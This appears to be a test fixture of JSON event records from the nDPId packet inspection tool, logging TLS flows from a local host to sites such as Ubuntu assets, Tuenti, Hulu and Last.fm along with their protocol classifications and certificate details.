+00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":361,"source":"sites.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482772264,"flow_last_seen":1646482772294,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482772294,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"185.125.190.21","src_port":42884,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.UbuntuONE","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"assets.ubuntu.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00942{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":362,"source":"sites.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482772264,"flow_last_seen":1646482772325,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482772325,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"185.125.190.21","src_port":42884,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.UbuntuONE","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.3","client_requested_server_name":"assets.ubuntu.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":363,"source":"sites.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482785304,"flow_last_seen":1646482785304,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482785304,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.169.91","src_port":51248,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":363,"source":"sites.pcapng","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1646482785304,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482785304,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8c2NAAEAG\/FHAqAGAX4OpW8gwAbszoGaBAAAAAKAC+vB9ogAAAgQFtAQCCArCJt4xAAAAAAEDAwc="} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"sites.pcapng","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1646482785347,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482785347,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADIGfbVfg6lbwKgBgAG7yDD0fDnYM6BmgqASOJCOBAAAAgQFtAQCCAoi\/WCZwibeMQEDAwk="} +01167{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":365,"source":"sites.pcapng","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1646482785351,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482785351,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5c2VAAEAG+lLAqAGAX4OpW8gwAbszoGaC9Hw52YAYAfYZoQAAAQEICsIm3l8i\/WCZFgMBAgABAAH8AwNK0euZMFtaCNBtu+eL8QS+C1QwW1wzikaweB9ZeLN7jCCkdWD5KYTe5rYj3sVQQUUDDmKS7Ul8Bkz8dJPsZBeSHgAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAPAA0AAAp0dWVudGkuY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIJK5tprzoOfSjZ23KXMf08y5udMKZfRYOXHDalLyYQBZABcAQQRLZU+TiBidby\/7mJhjeaCEAZfIl\/ESg4w9XgdOmdSs6KJ9\/6C1zE6e09432pgZPLx5qZNVUeHl8Lum72bGeXBPACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00875{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":365,"source":"sites.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482785304,"flow_last_seen":1646482785351,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482785351,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.169.91","src_port":51248,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tuenti.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00931{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":366,"source":"sites.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482785304,"flow_last_seen":1646482785395,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482785395,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.169.91","src_port":51248,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tuenti.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"61be9ce3d068c08ff99a857f62352f9d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01207{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":368,"source":"sites.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646482785304,"flow_last_seen":1646482785395,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3831,"flow_avg_l4_payload_len":638,"midstream":0,"thread_ts_msec":1646482785395,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.169.91","src_port":51248,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tuenti","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tuenti.com","server_names":"*.tuenti.com,tuenti.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"61be9ce3d068c08ff99a857f62352f9d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1","subjectDN":"C=ES, L=Madrid, O=Tuenti Technologies S.L., CN=*.tuenti.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"89:B8:FA:C7:22:04:D2:BE:C5:6E:59:10:31:67:42:B1:3F:6D:F8:3B"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":371,"source":"sites.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482786097,"flow_last_seen":1646482786097,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482786097,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.170.91","src_port":39302,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":371,"source":"sites.pcapng","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1646482786097,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482786097,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8MYNAAEAGPTLAqAGAX4OqW5mGAbs4G85LAAAAAKAC+vAJ+AAAAgQFtAQCCApUK4E8AAAAAAEDAwc="} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":372,"source":"sites.pcapng","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1646482786139,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482786139,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADEGfbVfg6pbwKgBgAG7mYaAJv+vOBvOTKASOJA3NAAAAgQFtAQCCAojEPIqVCuBPAEDAwk="} +01170{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":373,"source":"sites.pcapng","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1646482786140,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482786140,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5MYVAAEAGOzPAqAGAX4OqW5mGAbs4G85MgCb\/sIAYAfY7ugAAAQEIClQrgWcjEPIqFgMBAgABAAH8AwPCuINo9aszS1NOKEJoT\/qcXc1z2+SkMYjVWEN9Dzm1uCAc1Fe\/tF+S3TB+puhQn5k1kl\/SrZE1Zu7DG17b6iPYkAAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAWABQAABFzdGF0aWMudHVlbnRpLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACAO0kbEPJvFV01Owk3nxVpBPAsVRMhGqyVHONxZeCXXCAAXAEEEdYt+qtkVgPe4ucZXkNkiZFAQTN50kMr6BFmQ8vGiT4E\/aWy5wxXrEUez6C+lutJauRk\/zdA9y71YXWyeYxHbNwArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00896{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":373,"source":"sites.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482786097,"flow_last_seen":1646482786140,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482786140,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.170.91","src_port":39302,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tuenti","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"static.tuenti.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":374,"source":"sites.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482786097,"flow_last_seen":1646482786188,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482786188,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.170.91","src_port":39302,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tuenti","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"static.tuenti.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"61be9ce3d068c08ff99a857f62352f9d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01214{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":376,"source":"sites.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646482786097,"flow_last_seen":1646482786188,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3831,"flow_avg_l4_payload_len":638,"midstream":0,"thread_ts_msec":1646482786188,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.170.91","src_port":39302,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tuenti","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"static.tuenti.com","server_names":"*.tuenti.com,tuenti.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"61be9ce3d068c08ff99a857f62352f9d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1","subjectDN":"C=ES, L=Madrid, O=Tuenti Technologies S.L., CN=*.tuenti.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"89:B8:FA:C7:22:04:D2:BE:C5:6E:59:10:31:67:42:B1:3F:6D:F8:3B"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":379,"source":"sites.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482791144,"flow_last_seen":1646482791144,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482791144,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.101.195.214","src_port":51432,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":379,"source":"sites.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1646482791144,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482791144,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8FF5AAEAGQPrAqAGAX2XD1sjoAbs9AWSXAAAAAKAC+vBfJgAAAgQFtAQCCAoz72hZAAAAAAEDAwc="} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":380,"source":"sites.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1646482791167,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482791167,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADMGYlhfZcPWwKgBgAG7yOhRyYQJPQFkmKAS\/ohadwAAAgQFtAQCCAoA0SpiM+9oWQEDAwc="} +01165{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":381,"source":"sites.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1646482791170,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482791170,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5FGBAAEAGPvvAqAGAX2XD1sjoAbs9AWSYUcmECoAYAfYkYQAAAQEICjPvaHMA0SpiFgMBAgABAAH8AwPkjLny33P+mExr32cMRl62\/8RJSZlKid1V05U+ySIWLCA+yoN1VMfFXakU81pmrArAv4PMFa74gV6zhhtZIkRahgAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAANAAsAAAhodWx1LmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACATY1QXYS0qh7KvKliQF74PNyaFCqlZEZicpu9ccKADKQAXAEEEtcC0kqJMuUk4fNE8PcFvshva3wSMZbKQk5Gr6YxJX1t14RCVX0X4nJLqvHYB8ofAk7LBbtBWK6qUGB5XQIzcOQArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":381,"source":"sites.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482791144,"flow_last_seen":1646482791170,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482791170,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.101.195.214","src_port":51432,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Hulu","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"hulu.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00925{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":382,"source":"sites.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482791144,"flow_last_seen":1646482791191,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482791191,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.101.195.214","src_port":51432,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Hulu","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"hulu.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":383,"source":"sites.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482801387,"flow_last_seen":1646482801387,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482801387,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"34.96.123.111","src_port":44954,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":383,"source":"sites.pcapng","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1646482801387,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482801387,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8u7RAAEAGHxDAqAGAImB7b6+aAFDTrORQAAAAAKAC+vAeUwAAAgQFtAQCCAqmtsAlAAAAAAEDAwc="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":384,"source":"sites.pcapng","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1646482801394,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482801394,"pkt":"PKn0qB\/spJGxgjQ5CABFgAA8tJQAAHkGLLAiYHtvwKgBgABQr5rfpgWE06zkUaAS\/\/9QBgAAAgQFlgQCCArcngeAprbAJQEDAwg="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":385,"source":"sites.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482802720,"flow_last_seen":1646482802720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482802720,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"35.201.112.136","src_port":47122,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":385,"source":"sites.pcapng","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1646482802720,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482802720,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8g6pAAEAGYJjAqAGAI8lwiLgSAbvaEoGzAAAAAKAC+vAuRQAAAgQFtAQCCArAZPJXAAAAAAEDAwc="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":386,"source":"sites.pcapng","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1646482802726,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482802726,"pkt":"PKn0qB\/spJGxgjQ5CABFgAA8b+kAAHkGetkjyXCIwKgBgAG7uBJNy0p52hKBtKAS\/\/9IWQAAAgQFlgQCCArHroD1wGTyVwEDAwg="} +01169{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":387,"source":"sites.pcapng","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1646482802732,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482802732,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5g6xAAEAGXpnAqAGAI8lwiLgSAbvaEoG0TctKeoAYAfa\/ZwAAAQEICsBk8mLHroD1FgMBAgABAAH8AwM6s1cKgDvTG3LALyk7fAmvRJX9DNZN37XWMNl1\/SdHaCCUR56oKGM2UcODstsWkptKjiMgLAJPLuO56cI3NFuiCgAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAASABAAAA1rZXJ2ZS5sYXN0LmZtABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIEXwFTh8NFdQPbVwjRz3qZyMML4Z+FJITLECgKzAH2YhABcAQQROHWQ9TZ\/FNyVoueylOLPpt31B2wF8YuKZg+41\/WG\/Ucaum9xuzZgJXugnVJqsHgtbN0plSfDPGhyRi1GNW\/CAACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00887{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":387,"source":"sites.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482802720,"flow_last_seen":1646482802732,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482802732,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"35.201.112.136","src_port":47122,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.LastFM","breed":"Fun","category":"Music"},"tls": {"version":"TLSv1.2","client_requested_server_name":"kerve.last.fm","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00928{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":388,"source":"sites.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482802720,"flow_last_seen":1646482802742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646482802742,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"35.201.112.136","src_port":47122,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.LastFM","breed":"Fun","category":"Music"},"tls": {"version":"TLSv1.3","client_requested_server_name":"kerve.last.fm","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 